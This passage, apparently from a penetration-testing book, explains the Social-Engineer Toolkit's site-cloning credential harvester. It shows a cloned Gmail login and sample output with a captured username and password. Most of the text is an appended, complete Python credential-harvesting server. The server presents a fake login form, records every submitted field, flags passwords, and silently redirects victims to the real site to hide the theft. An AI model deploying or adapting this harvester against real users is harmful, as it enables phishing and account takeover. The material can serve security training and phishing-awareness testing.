The Social-Engineer Toolkit
After you select Website Attack Vectors and then the Credential Harvester, choose Site Cloner. The configuration for this attack is minimal: you need only pass SET a URL (http://www.secmaniac.com) that contains a login form. The capture shown below comes from a cloned Gmail login page.
SET's web server then starts and waits for a target to connect. As mentioned previously, you could in this instance set WEBATTACK_CONFIG=ON, and SET would prompt you to send a mass email to coax targets into clicking the link. The target is presented with a web page that looks identical to Gmail's initial login page. When the target submits a username and password, the cloned page posts the form to SET's server, which records every submitted field and then redirects the browser to the real Gmail site, so the target lands on the genuine login page (an alert user may still notice the address change in the location bar or the second login prompt). Meanwhile, the following output is presented to the attacker:
10.10.1.102 - - "GET / HTTP/1.1" 200 -
[*] WE GOT A HIT! Printing the output:
PARAM: ltmpl=default
PARAM: ltmplcache=2
PARAM: continue=https://mail.google.com/mail/?
PARAM: service=mail
PARAM: rm=false
PARAM: dsh=-1174166214807618980
PARAM: ltmpl=default
PARAM: ltmpl=default
PARAM: scc=1
PARAM: ss=1
PARAM: GALX=S3ftXFIww0E
POSSIBLE USERNAME FIELD FOUND: Email=ihazomgsecurity2390239203
POSSIBLE PASSWORD FIELD FOUND: Passwd=thisisacomplexp@55w0rd!!!!!
PARAM: rmShown=1
PARAM: signIn=Sign+in
PARAM: asts=
[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.
SET uses a built-in dictionary of field names to mark form fields and parameters on cloned sites that are likely to carry sensitive information. Potential username and password parameters are highlighted in red to indicate that they are worth investigating. The matching is by field name, so a credential field with an unusual name is still captured, but it is listed as an ordinary PARAM rather than flagged.
Once you've finished harvesting all of the targets' credentials, press CTRL-C to generate a report, as shown in Figure 10-3. The report is written in both XML and HTML formats.
SET's web server is multithreaded and can serve as many concurrent requests as the host it runs on can handle. When several targets enter their credentials into the cloned site, SET parses each submission into the report, separating the form fields so that they are readable.
You can also export the credential harvesting results as XML to import later into tools or parsers that you already use.
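The mechanism described above, from the cloned form through the POST capture, the dictionary-based marking of username and password fields, the redirect to the genuine site, and the XML report written on CTRL-C, in one compact Python sketch. This is an added example written for this page, not SET's own code; the hint words, the cloned form, the redirect target, and the sample POST body are all assumptions constructed for illustration.

```python
"""Minimal credential-harvester sketch (added example, not SET's code)."""
from http import HTTPStatus
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qsl
import xml.etree.ElementTree as ET

# Assumed dictionary of name fragments that usually carry credentials.
# SET ships its own list; these are chosen for the example only.
USERNAME_HINTS = ("user", "email", "login", "uname", "account")
PASSWORD_HINTS = ("pass", "pwd", "secret")

# Constructed sample POST body, shaped like the Gmail capture above.
SAMPLE_BODY = ("ltmpl=default&continue=https%3A%2F%2Fmail.google.com%2Fmail%2F%3F"
               "&service=mail&Email=alice%40example.com&Passwd=hunter2"
               "&signIn=Sign+in&asts=")


def classify_field(name):
    """Return 'username', 'password' or 'param' for a form field name.
    Password hints are tested first so 'user_password' is a password."""
    lowered = name.lower()
    if any(h in lowered for h in PASSWORD_HINTS):
        return "password"
    if any(h in lowered for h in USERNAME_HINTS):
        return "username"
    return "param"


def parse_post(body):
    """Split a form-urlencoded body into (kind, name, value) triples,
    keeping order, duplicates and blank values (the capture above has all three)."""
    return [(classify_field(k), k, v)
            for k, v in parse_qsl(body, keep_blank_values=True)]


def render_hit(client, fields):
    """Produce console lines in the same style SET prints on a submission."""
    lines = ["[*] WE GOT A HIT from %s! Printing the output:" % client]
    for kind, name, value in fields:
        if kind == "username":
            lines.append("POSSIBLE USERNAME FIELD FOUND: %s=%s" % (name, value))
        elif kind == "password":
            lines.append("POSSIBLE PASSWORD FIELD FOUND: %s=%s" % (name, value))
        else:
            lines.append("PARAM: %s=%s" % (name, value))
    return "\n".join(lines)


def xml_report(hits):
    """Serialise every captured submission as XML for import into other tools."""
    root = ET.Element("harvester")
    for client, fields in hits:
        hit = ET.SubElement(root, "hit", client=client)
        for kind, name, value in fields:
            ET.SubElement(hit, "field", kind=kind, name=name).text = value
    return ET.tostring(root, encoding="unicode")


class HarvesterHandler(BaseHTTPRequestHandler):
    """Serve the cloned form, record POSTed fields, then bounce the victim
    to the real site so the page they end up on is the genuine one."""
    cloned_html = ("<form method=post><input name=Email>"
                   "<input name=Passwd type=password><input type=submit></form>")
    redirect_to = "https://mail.google.com/mail/"   # assumed redirect target
    hits = []                                       # shared across requests

    def do_GET(self):
        self.send_response(HTTPStatus.OK)
        self.send_header("Content-Type", "text/html")
        self.end_headers()
        self.wfile.write(self.cloned_html.encode())

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        body = self.rfile.read(length).decode(errors="replace")
        fields = parse_post(body)
        self.hits.append((self.client_address[0], fields))
        print(render_hit(self.client_address[0], fields))
        self.send_response(HTTPStatus.FOUND)        # 302 to the real login page
        self.send_header("Location", self.redirect_to)
        self.end_headers()

    def log_message(self, *args):                   # keep console to hits only
        pass


if __name__ == "__main__":
    server = HTTPServer(("127.0.0.1", 8080), HarvesterHandler)
    try:
        server.serve_forever()
    except KeyboardInterrupt:                       # CTRL-C writes the report
        print(xml_report(HarvesterHandler.hits))
```

Run it, browse to http://127.0.0.1:8080/ and submit the form: the console shows the flagged fields and the browser ends up on the redirect target. The name-based dictionary is the weak spot worth remembering when you review a capture: a site that names its password input something like `p` is still recorded, but only as a PARAM line.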